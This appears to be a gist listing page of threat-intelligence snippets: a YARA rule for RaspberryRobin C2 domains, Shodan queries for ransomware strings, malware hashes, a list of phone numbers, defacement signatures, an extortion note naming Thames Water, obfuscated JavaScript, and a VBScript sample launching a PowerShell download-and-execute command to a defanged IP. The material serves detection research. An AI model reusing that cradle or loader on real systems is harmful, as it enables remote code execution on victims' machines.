This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import "vt" | |
rule RaspberryRobin_C2Domains{ | |
meta: | |
description = "Checks for Files with RaspberryRobin C2 domains" | |
author = "Will Thomas (@BushidoToken), Equinix Threat Analysis Center (ETAC)" | |
date = "2023-APRIL-14" | |
tlp = "CLEAR" | |
adversary = "DEV-0856" | |
strings: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Loki | |
https://www.shodan.io/search?query=%22Loki+Locker%22 | |
BlackBit | |
https://www.shodan.io/search?query=%22Encrypted+by+BlackBit%22 | |
BlackHunt | |
https://www.shodan.io/search?query=%22Your+Network+Infected+with+BlackHunt+Ransomware+Team%22 | |
Amelia, Proxima |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1.exe | Netherlands | First seen : 2022-12-23 | |
de025f921dd477c127fba971b9f90accfb58b117274ba1afb1aaf2222823b6ac | |
qut.dll | Australia | First seen : 2022-12-23 | |
8e01ecf9d804454f34eeceb0f7793f4884be8868886a646526419fc2e2bbb648 | |
gdr.exe | Argentina | First seen : 2022-12-21 | |
bc06587b96b2628480d47579bcc2519a9da2b55aa037a49af4cd03811c534f66 | |
windows_encryptor.exe | Hong Kong | First seen : 2022-12-18 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
+44 7737 359848 Three | |
+44 7521 967428 O2 | |
+44 7415 787846 EE | |
+44 7523 322875 O2 | |
+44 7419 756102 EE | |
+44 7575 186994 Three | |
+44 7497 580997 EE | |
+44 7544 631585 O2 | |
+44 70 3401 7692 "Protected" / Unknown | |
+353 (89) 499 6551 Liffey Telecom / Tesco Mobile |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Hacked By ./EcchiExploit | |
2E4H - BHIOFF - Manusia Biasa Team | |
BhiOfficial | |
Banyumas Cyber Team | |
[email protected] | |
LulzGhost Team | |
Manusia Biasa Team | |
http.html:"EcchiExploit" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Website: | |
www.thameswater.co.uk | |
Revenue: | |
$2 billion | |
Thames Water supply much of critical water services to people and companies. | |
This company is public and this mean not only they bring water and sewage services to millions of people they also allow many people and company to invest with their stock offering. | |
Companies like this have much responsibility and we contact them and tell them that they have very bad holes in their systems. ALL SYSTEMS. | |
We spent months in the company system and saw first hand evidence of very bad practice. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(function(_0x25cba2, _0x45eb40) { | |
var a0_0x501b44 = { | |
_0x17e23d: 0x38, | |
_0x205270: 'CuXi', | |
_0x4af451: 0x55, | |
_0x3d4924: 0x44, | |
_0x2c4ea4: 0x28, | |
_0x561b2d: 'Sg20', | |
_0x5656b1: 0x37, | |
_0x3c1bf0: 'Urg4', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script language="VBScript"> | |
Function dl() | |
Dim var_shell | |
Set var_shell = CreateObject("Wscript.Shell") | |
var_shell.run "powershell -c $s1='IE';$s2='X(New-Object Net.WebClie';$s3='nt).Downlo';$s4='adString(''hxxp://159.223.37[.]182/update'')';IEX ($s1+$s2+$s3+$s4)", 0, true | |
End Function | |
dl |
NewerOlder